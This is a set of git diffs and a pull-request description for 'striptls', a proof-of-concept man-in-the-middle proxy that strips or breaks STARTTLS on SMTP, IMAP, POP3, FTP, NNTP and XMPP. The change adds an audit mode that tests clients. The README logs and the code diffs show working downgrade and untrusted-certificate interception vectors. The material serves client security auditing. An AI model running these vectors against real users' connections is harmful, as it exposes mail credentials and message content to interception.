+ * XMPP.StripFromCapabilities
+ 
+ 
+## Examples
 
 local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25
 

--- a/README.md
+++ b/README.md
@@ -19,9 +19,87 @@ poc implementation of STARTTLS stripping attacks
 
 local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25
 
+### Audit Mode
+
+iterates all protocol specific cases on a per client basis and keeps track of clients violating the starttls protocol. Ctrl+C to abort audit and print results.
+
+	#> striptls/striptls.py --listen localhost:8825 --remote=mail.gmx.net:25
+	2016-01-31 22:48:03,805 - INFO     - <Proxy 0x20a8fb0 listen=('0.0.0.0', 8825) target=('mail.gmx.net', 25)> ready.
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:21   , proto:     FTP): <class __main__.StripFromCapabilities at 0x020B1148>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:21   , proto:     FTP): <class __main__.StripWithError at 0x020B1180>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:21   , proto:     FTP): <class __main__.UntrustedIntercept at 0x020B11B8>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:143  , proto:    IMAP): <class __main__.StripFromCapabilities at 0x020B1068>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:143  , proto:    IMAP): <class __main__.StripWithError at 0x020B10A0>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:143  , proto:    IMAP): <class __main__.UntrustedIntercept at 0x020B10D8>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:119  , proto:    NNTP): <class __main__.StripFromCapabilities at 0x020B1228>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:119  , proto:    NNTP): <class __main__.StripWithError at 0x020B1260>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:119  , proto:    NNTP): <class __main__.UntrustedIntercept at 0x020B1298>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:110  , proto:    POP3): <class __main__.StripWithError at 0x02099F80>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:110  , proto:    POP3): <class __main__.UntrustedIntercept at 0x02099FB8>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:25   , proto:    SMTP): <class __main__.StripFromCapabilities at 0x02099E30>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:25   , proto:    SMTP): <class __main__.StripWithError at 0x02099ED8>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:25   , proto:    SMTP): <class __main__.StripWithInvalidResponseCode at 0x02099E68>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:25   , proto:    SMTP): <class __main__.StripWithTemporaryError at 0x02099EA0>
+	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:25   , proto:    SMTP): <class __main__.UntrustedIntercept at 0x02099F10>
+	2016-01-31 22:48:03,806 - DEBUG    - * added test (port:5222 , proto:    XMPP): <class __main__.StripFromCapabilities at 0x020B1308>
+	2016-01-31 22:48:03,806 - INFO     - <RewriteDispatcher rules={5222: set([<class __main__.StripFromCapabilities at 0x020B1308>]), 110: set([<class __main__.StripWithError at 0x02099F80>, <class __main__.UntrustedIntercept at 0x02099FB8>]), 143: set([<class __main__.StripWithError at 0x020B10A0>, <class __main__.UntrustedIntercept at 0x020B10D8>, <class __main__.StripFromCapabilities at 0x020B1068>]), 21: set([<class __main__.StripWithError at 0x020B1180>, <class __main__.UntrustedIntercept at 0x020B11B8>, <class __main__.StripFromCapabilities at 0x020B1148>]), 119: set([<class __main__.UntrustedIntercept at 0x020B1298>, <class __main__.StripFromCapabilities at 0x020B1228>, <class __main__.StripWithError at 0x020B1260>]), 25: set([<class __main__.UntrustedIntercept at 0x02099F10>, <class __main__.StripWithTemporaryError at 0x02099EA0>, <class __main__.StripFromCapabilities at 0x02099E30>, <class __main__.StripWithError at 0x02099ED8>, <class __main__.StripWithInvalidResponseCode at 0x02099E68>])}>
+	2016-01-31 22:48:07,921 - DEBUG    - <ProtocolDetect 0x20cbc50 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
+	2016-01-31 22:48:07,923 - INFO     - <Session 0x20be1f0> client ('127.0.0.1', 22898) has connected
+	2016-01-31 22:48:07,923 - INFO     - <Session 0x20be1f0> connecting to target ('mail.gmx.net', 25)
+	2016-01-31 22:48:08,158 - DEBUG    - <Session 0x20be1f0> [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
+	2016-01-31 22:48:08,158 - DEBUG    - <RewriteDispatcher  - changed mangle: __main__.UntrustedIntercept new: True>
+	2016-01-31 22:48:09,112 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'ehlo [192.168.139.1]\r\n'
+	2016-01-31 22:48:09,194 - DEBUG    - <Session 0x20be1f0> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
+	2016-01-31 22:48:09,194 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'STARTTLS\r\n'
+	2016-01-31 22:48:09,194 - DEBUG    - <Session 0x20be1f0> [client] <= [server][mangled] '220 Go ahead\r\n'
+	2016-01-31 22:48:09,444 - DEBUG    - <Session 0x20be1f0> [client] <= [server][mangled] waiting for inbound SSL Handshake
+	2016-01-31 22:48:09,444 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'STARTTLS\r\n'
+	2016-01-31 22:48:09,538 - DEBUG    - <Session 0x20be1f0> [client] => [server][mangled] performing outbound SSL handshake
+	2016-01-31 22:48:09,948 - DEBUG    - <Session 0x20be1f0> [client] => [server][mangled] None
+	2016-01-31 22:48:09,948 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'ehlo [192.168.139.1]\r\n'
+	2016-01-31 22:48:10,029 - DEBUG    - <Session 0x20be1f0> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 69920427\r\n250 AUTH LOGIN PLAIN\r\n'
+	2016-01-31 22:48:10,029 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
+	2016-01-31 22:48:10,108 - DEBUG    - <Session 0x20be1f0> [client] <= [server]          '530 Authentication required\r\n'
+	2016-01-31 22:48:10,108 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'rset\r\n'
+	2016-01-31 22:48:10,217 - DEBUG    - <Session 0x20be1f0> [client] <= [server]          '250 OK\r\n'
+	2016-01-31 22:48:10,230 - WARNING  - <Session 0x20be1f0> terminated.
+	2016-01-31 22:48:12,375 - DEBUG    - <ProtocolDetect 0x20cbd70 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
+	2016-01-31 22:48:12,377 - INFO     - <Session 0x20cbcf0> client ('127.0.0.1', 22901) has connected
+	2016-01-31 22:48:12,377 - INFO     - <Session 0x20cbcf0> connecting to target ('mail.gmx.net', 25)
+	2016-01-31 22:48:12,517 - DEBUG    - <Session 0x20cbcf0> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
+	2016-01-31 22:48:12,517 - DEBUG    - <RewriteDispatcher  - changed mangle: __main__.StripWithTemporaryError new: True>
+	2016-01-31 22:48:13,503 - DEBUG    - <Session 0x20cbcf0> [client] => [server]          'ehlo [192.168.139.1]\r\n'
+	2016-01-31 22:48:13,585 - DEBUG    - <Session 0x20cbcf0> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
+	2016-01-31 22:48:13,601 - DEBUG    - <Session 0x20cbcf0> [client] => [server]          'STARTTLS\r\n'
+	2016-01-31 22:48:13,601 - DEBUG    - <Session 0x20cbcf0> [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
+	2016-01-31 22:48:13,601 - DEBUG    - <Session 0x20cbcf0> [client] => [server][mangled] None
+	2016-01-31 22:48:13,601 - DEBUG    - <Session 0x20cbcf0> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
+	2016-01-31 22:48:13,696 - DEBUG    - <Session 0x20cbcf0> [client] <= [server]          '530 Authentication required\r\n'
+	2016-01-31 22:48:13,711 - DEBUG    - <Session 0x20cbcf0> [client] => [server]          'rset\r\n'
+	2016-01-31 22:48:13,789 - DEBUG    - <Session 0x20cbcf0> [client] <= [server]          '250 OK\r\n'
+	2016-01-31 22:48:13,805 - WARNING  - <Session 0x20cbcf0> terminated.
+	2016-01-31 22:48:15,648 - DEBUG    - <ProtocolDetect 0x20cbe30 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
+	2016-01-31 22:48:15,650 - INFO     - <Session 0x20cbd30> client ('127.0.0.1', 22904) has connected
+	2016-01-31 22:48:15,650 - INFO     - <Session 0x20cbd30> connecting to target ('mail.gmx.net', 25)
+	2016-01-31 22:48:15,808 - DEBUG    - <Session 0x20cbd30> [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
+	2016-01-31 22:48:15,808 - DEBUG    - <RewriteDispatcher  - changed mangle: __main__.StripFromCapabilities new: True>
+	2016-01-31 22:48:16,778 - DEBUG    - <Session 0x20cbd30> [client] => [server]          'ehlo [192.168.139.1]\r\n'
+	2016-01-31 22:48:16,907 - DEBUG    - <Session 0x20cbd30> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
+	2016-01-31 22:48:16,907 - DEBUG    - <Session 0x20cbd30> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
+	2016-01-31 22:48:16,921 - WARNING  - <Session 0x20cbd30> terminated.
+	2016-01-31 22:48:59,542 - WARNING  - <Session 0x20b97f0> terminated.
+	...
+	2016-01-31 22:49:03,305 - WARNING  - Ctrl C - Stopping server
+	2016-01-31 22:49:03,305 - INFO     -  -- audit results --
+	2016-01-31 22:49:03,305 - INFO     - [*] client: 127.0.0.1
+	2016-01-31 22:49:03,305 - INFO     -     [           ] <class __main__.StripFromCapabilities at 0x01ECF180>
+	2016-01-31 22:49:03,305 - INFO     -     [Vulnerable!] <class __main__.StripWithError at 0x01ECF688>
+	2016-01-31 22:49:03,305 - INFO     -     [Vulnerable!] <class __main__.UntrustedIntercept at 0x01ECF6F8>
+	2016-01-31 22:49:03,305 - INFO     -     [Vulnerable!] <class __main__.StripWithInvalidResponseCode at 0x01ECF5E0>
+
 ### Strip STARTTLS from server capabilities
 
-	#> striptls/striptls.py localhost 8825 mail.gmx.net 25 SMTP.StripFromCapabilities
+	#> striptls/striptls.py --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripFromCapabilities
 	2016-01-31 15:44:35,000 - INFO     - <Proxy 0x1fe6e70 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
 	2016-01-31 15:44:35,000 - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.StripFromCapabilities at 0x01FE77D8>])}>
 	2016-01-31 15:44:37,030 - DEBUG    - <ProtocolDetect 0x1fe6f90 is_protocol=PROTO_SMTP len_history=0> - protocol detected (target port)
@@ -39,7 +117,7 @@ local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25
 
 ### Invalid STARTTLS response code
 
-	#> striptls/striptls.py localhost 8825 mail.gmx.net 25 SMTP.StripWithInvalidResponseCode
+	#> striptls/striptls.py --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripWithInvalidResponseCode
 	2016-01-31 15:42:40,325 - INFO     - <Proxy 0x1fefe70 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
 	2016-01-31 15:42:40,325 - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.StripWithInvalidResponseCode at 0x02010730>])}>
 	2016-01-31 15:43:19,755 - DEBUG    - <ProtocolDetect 0x1feff90 is_protocol=PROTO_SMTP len_history=0> - protocol detected (target port)
@@ -61,7 +139,7 @@ local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25
 
 ### Untrusted SSL Intercept (for clients not checking server cert trust)
 
-	#> striptls/striptls.py localhost 8825 mail.gmx.net 25 SMTP.UntrustedIntercept
+	#> striptls/striptls.py --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.UntrustedIntercept
 	2016-01-31 15:59:02,417 - INFO     - <Proxy 0x1f468f0 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
 	2016-01-31 15:59:02,417 - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.UntrustedIntercept at 0x01F45298>])}>
 	2016-01-31 15:59:06,292 - DEBUG    - <ProtocolDetect 0x1f46a10 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)

--- a/striptls/__init__.py
+++ b/striptls/__init__.py
@@ -1,4 +1,1 @@
 import striptls
-
-if __name__ == '__main__':
-    striptls.main()

--- a/striptls/__init__.py
+++ b/striptls/__init__.py
@@ -1,33 +1,4 @@
-from striptls import *
+import striptls
 
 if __name__ == '__main__':
-    ret = 0
-    if not len(sys.argv)>1:
-        print ("""<listen_ip> <listen_port> <forward_ip> <forward_port> [<attack_class>]
-    attack_class ... SMTP.StripFromCapabilities, SMTP.StripWithInvalidResponseCode, SMTP.UntrustedIntercept, ...
-        """)
-        sys.exit(1)
-    
-    local_listen = (sys.argv[1], int(sys.argv[2]))
-    forward_to = (sys.argv[3],int(sys.argv[4]))
-    classname = sys.argv[5] if len(sys.argv)>5 else "SMTP.StripFromCapabilities"
-    ## hacky!
-    if "." in classname:
-        lastdot = classname.rfind(".")
-        cls = getattr(locals().get(classname[:lastdot]),classname[lastdot+1:])
-        
-    # magic
-    prx = ProxyServer(listen=local_listen, target=forward_to, buffer_size=4096, delay=0.00001)
-    logger.info("%s ready."%prx)
-    rewrite = RewriteDispatcher()
-    rewrite.add(ProtocolDetect.PROTO_SMTP, cls)
-    
-    logging.info( repr(rewrite))
-    prx.set_callback("mangle_server_data", rewrite.mangle_server_data)
-    prx.set_callback("mangle_client_data", rewrite.mangle_client_data)
-    try:
-        prx.main_loop()
-    except KeyboardInterrupt:
-        logger.warning( "Ctrl C - Stopping server")
-        ret+=1
-    sys.exit(ret)
+    striptls.main()

--- a/striptls/__main__.py
+++ b/striptls/__main__.py
@@ -1,0 +1,4 @@
+import striptls
+
+if __name__ == '__main__':
+    striptls.main()

--- a/striptls/striptls.py
+++ b/striptls/striptls.py
@@ -811,7 +811,7 @@ def main():
         logger.warning( "Ctrl C - Stopping server")
         ret+=1
         
-    logger.info(" -- analysis results --")
+    logger.info(" -- audit results --")
     for client,resultlist in rewrite.get_results_by_clients().iteritems():
         logger.info("[*] client: %s"%client)
         for mangle, result in resultlist:

--- a/striptls/striptls.py
+++ b/striptls/striptls.py
@@ -268,11 +268,11 @@ class ProxyServer(object):
                         self.inbound.remove(sock)
                     raise        
 
-class Tests:
+class Vectors:
     _TLS_CERTFILE = "server.pem"
     _TLS_KEYFILE = "server.pem"
     class SMTP:
-        _PORT = 25
+        _PROTO_ID = 25
         class StripFromCapabilities:
             ''' 1) Force Server response to *NOT* announce STARTTLS support
                 2) raise exception if client tries to negotiated STARTTLS
@@ -363,8 +363,8 @@ class Tests:
                     session.inbound.sendall("220 Go ahead\r\n")
                     logging.debug("%s [client] <= [server][mangled] %s"%(session,repr("220 Go ahead\r\n")))
                     context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
-                    context.load_cert_chain(certfile=Tests._TLS_CERTFILE, 
-                                            keyfile=Tests._TLS_KEYFILE)
+                    context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, 
+                                            keyfile=Vectors._TLS_KEYFILE)
                     session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                     logging.debug("%s [client] <= [server][mangled] waiting for inbound SSL Handshake"%(session))
                     # outbound ssl
@@ -384,7 +384,7 @@ class Tests:
                 return data
     
     class POP3:
-        _PORT = 110
+        _PROTO_ID = 110
         class StripWithError:
             ''' 1) force server error on client sending STLS
             '''
@@ -414,8 +414,8 @@ class Tests:
                     session.inbound.sendall("+OK Begin TLS negotiation\r\n")
                     logging.debug("%s [client] <= [server][mangled] %s"%(session,repr("+OK Begin TLS negotiation\r\n")))
                     context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
-                    context.load_cert_chain(certfile=Tests._TLS_CERTFILE, 
-                                            keyfile=Tests._TLS_CERTFILE)
+                    context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, 
+                                            keyfile=Vectors._TLS_CERTFILE)
                     session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                     logging.debug("%s [client] <= [server][mangled] waiting for inbound SSL Handshake"%(session))
                     # outbound ssl
@@ -433,7 +433,7 @@ class Tests:
                 return data
             
     class IMAP:
-        _PORT = 143
+        _PROTO_ID = 143
         class StripFromCapabilities:
             ''' 1) Force Server response to *NOT* announce STARTTLS support
                 2) raise exception if client tries to negotiated STARTTLS
@@ -480,8 +480,8 @@ class Tests:
                     session.inbound.sendall("%s OK Begin TLS negotation now\r\n"%id)
                     logging.debug("%s [client] <= [server][mangled] %s"%(session,repr("%s OK Begin TLS negotation now\r\n"%id)))
                     context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
-                    context.load_cert_chain(certfile=Tests._TLS_CERTFILE, 
-                                            keyfile=Tests._TLS_CERTFILE)
+                    context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, 
+                                            keyfile=Vectors._TLS_CERTFILE)
                     session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                     logging.debug("%s [client] <= [server][mangled] waiting for inbound SSL Handshake"%(session))
                     # outbound ssl
@@ -499,7 +499,7 @@ class Tests:
                 return data
             
     class FTP:
-        _PORT = 21
+        _PROTO_ID = 21
         class StripFromCapabilities:
             ''' 1) Force Server response to *NOT* announce AUTH TLS support
                 2) raise exception if client tries to negotiated AUTH TLS
@@ -546,8 +546,8 @@ class Tests:
                     session.inbound.sendall("234 OK Begin TLS negotation now\r\n")
                     logging.debug("%s [client] <= [server][mangled] %s"%(session,repr("234 OK Begin TLS negotation now\r\n")))
                     context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
-                    context.load_cert_chain(certfile=Tests._TLS_CERTFILE, 
-                                            keyfile=Tests._TLS_KEYFILE)
+                    context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, 
+                                            keyfile=Vectors._TLS_KEYFILE)
                     session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                     logging.debug("%s [client] <= [server][mangled] waiting for inbound SSL Handshake"%(session))
                     # outbound ssl
@@ -565,7 +565,7 @@ class Tests:
                 return data
             
     class NNTP:
-        _PORT = 119
+        _PROTO_ID = 119
         class StripFromCapabilities:
             ''' 1) Force Server response to *NOT* announce AUTH TLS support
                 2) raise exception if client tries to negotiated AUTH TLS
@@ -612,8 +612,8 @@ class Tests:
                     session.inbound.sendall("382 Continue with TLS negotiation\r\n")
                     logging.debug("%s [client] <= [server][mangled] %s"%(session,repr("382 Continue with TLS negotiation\r\n")))
                     context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
-                    context.load_cert_chain(certfile=Tests._TLS_CERTFILE, 
-                                            keyfile=Tests._TLS_KEYFILE)
+                    context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, 
+                                            keyfile=Vectors._TLS_KEYFILE)
                     session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                     logging.debug("%s [client] <= [server][mangled] waiting for inbound SSL Handshake"%(session))
                     # outbound ssl
@@ -631,7 +631,7 @@ class Tests:
                 return data
     
     class XMPP:
-        _PORT = 5222
+        _PROTO_ID = 5222
         class StripFromCapabilities:
             ''' 1) Force Server response to *NOT* announce STARTTLS support
                 2) raise exception if client tries to negotiated STARTTLS
@@ -748,31 +748,31 @@ def main():
     from optparse import OptionParser
     ret = 0
     usage = """usage: %prog [options]
-        example: %prog --listen 0.0.0.0:25 --remote mail.server.tld:25 --tests *
+    
+       example: %prog --listen 0.0.0.0:25 --remote mail.server.tld:25 
     """
     parser = OptionParser(usage=usage)
     parser.add_option("-v", "--verbose",
                   action="store_true", dest="verbose", default=True,
                   help="make lots of noise [default]")
-    parser.add_option("-l", "--listen", dest="listen", help="listen ip:port")
-    parser.add_option("-r", "--remote", dest="remote", help="target ip:port")
+    parser.add_option("-l", "--listen", dest="listen", help="listen ip:port [default: 0.0.0.0:<remote_port>]")
+    parser.add_option("-r", "--remote", dest="remote", help="remote target ip:port to forward sessions to")
+    parser.add_option("-k", "--key", dest="key", default="server.pem", help="SSL Certificate and Private key file to use, PEM format assumed [default: %default]")
     
-    all_tests = []
-    for proto in [t for t in dir(Tests) if not t.startswith("_")]:
-        for test in [t for t in dir(getattr(Tests,proto)) if not t.startswith("_")]:
-            all_tests.append("%s.%s"%(proto,test))
-    parser.add_option("-t", "--tests",
-                  default="*",
-                  help="Comma separated list of tests. * selects ALL. Available Tests: "+", ".join(all_tests)+""
+    all_vectors = []
+    for proto in (v for v in dir(Vectors) if not v.startswith("_")):
+        for test in (v for v in dir(getattr(Vectors,proto)) if not v.startswith("_")):
+            all_vectors.append("%s.%s"%(proto,test))
+    parser.add_option("-x", "--vectors",
+                  default="ALL",
+                  help="Comma separated list of vectors. Use 'ALL' (default) to select all vectors. Available vectors: "+", ".join(all_vectors)+""
                   " [default: %default]")
-    
     # parse args
     (options, args) = parser.parse_args()
     # normalize args
     if options.verbose:
         logger.setLevel(logging.DEBUG)
     if not options.remote:
-        parser.print_help()
         parser.error("mandatory option: remote")
     else:
         options.remote = options.remote.strip().split(":")
@@ -783,22 +783,23 @@ def main():
     else:
         options.listen = options.listen.strip().split(":")
         options.listen = (options.listen[0], int(options.listen[1]))
-    options.tests = [o.strip() for o in options.tests.strip().split(",")]
-    if "*" in options.tests:
-        options.tests = all_tests
+    options.vectors = [o.strip() for o in options.vectors.strip().split(",")]
+    if "ALL" in options.vectors:
+        options.vectors = all_vectors
+    Vectors._TLS_CERTFILE = Vectors._TLS_KEYFILE = options.key
           
     # ---- start up engines ----
     prx = ProxyServer(listen=options.listen, target=options.remote, buffer_size=4096, delay=0.00001)
     logger.info("%s ready."%prx)
     rewrite = RewriteDispatcher()
     
-    for classname in options.tests:
+    for classname in options.vectors:
         try:
-            proto, test = classname.split('.',1)
-            cls_proto = getattr(globals().get("Tests"),proto)
-            cls_test = getattr(cls_proto, test)
-            rewrite.add(cls_proto._PORT, cls_test)
-            logger.debug("* added test (port:%-5d, proto:%8s): %s"%(cls_proto._PORT, proto, repr(cls_test)))
+            proto, vector = classname.split('.',1)
+            cls_proto = getattr(globals().get("Vectors"),proto)
+            cls_vector = getattr(cls_proto, vector)
+            rewrite.add(cls_proto._PROTO_ID, cls_vector)
+            logger.debug("* added test (port:%-5d, proto:%8s): %s"%(cls_proto._PROTO_ID, proto, repr(cls_vector)))
         except Exception, e:
             raise e
 

--- a/striptls/striptls.py
+++ b/striptls/striptls.py
@@ -655,12 +655,12 @@ class Tests:
 
 class RewriteDispatcher(object):
     def __init__(self):
-        self.mangles = {}   # proto:[attacks]
+        self.vectors = {}   # proto:[vectors]
         self.results = []   # [ {session,client_ip,mangle,result}, }
         self.session_to_mangle = {}  # session:mangle
         
     def __repr__(self):
-        return "<RewriteDispatcher rules=%s>"%repr(self.mangles)
+        return "<RewriteDispatcher vectors=%s>"%repr(self.vectors)
     
     def get_results(self):
         return self.results
@@ -686,8 +686,8 @@ class RewriteDispatcher(object):
         r['result'] = value
           
     def add(self, proto, attack):
-        self.mangles.setdefault(proto,set([]))
-        self.mangles[proto].add(attack)
+        self.vectors.setdefault(proto,set([]))
+        self.vectors[proto].add(attack)
         
     def get_mangle(self, session):
         ''' smart select mangle
@@ -722,7 +722,7 @@ class RewriteDispatcher(object):
         return mangle
         
     def get_mangles(self, proto):
-        return self.mangles.get(proto,[])
+        return self.vectors.get(proto,[])
         
     def mangle_server_data(self, session, data):
         data_orig = data


### PR DESCRIPTION
client audit mode iterating all available protocol specific striptls vectors.
Ctrl+C to abort and print results.

```
    ....
2016-01-31 22:49:03,305 - WARNING  - Ctrl C - Stopping server
2016-01-31 22:49:03,305 - INFO     -  -- audit results --
2016-01-31 22:49:03,305 - INFO     - [*] client: 127.0.0.1
2016-01-31 22:49:03,305 - INFO     -     [           ] <class __main__.StripFromCapabilities at 0x01ECF180>
2016-01-31 22:49:03,305 - INFO     -     [Vulnerable!] <class __main__.StripWithError at 0x01ECF688>
2016-01-31 22:49:03,305 - INFO     -     [Vulnerable!] <class __main__.UntrustedIntercept at 0x01ECF6F8>
2016-01-31 22:49:03,305 - INFO     -     [Vulnerable!] <class __main__.StripWithInvalidResponseCode at 0x01ECF5E0>
```
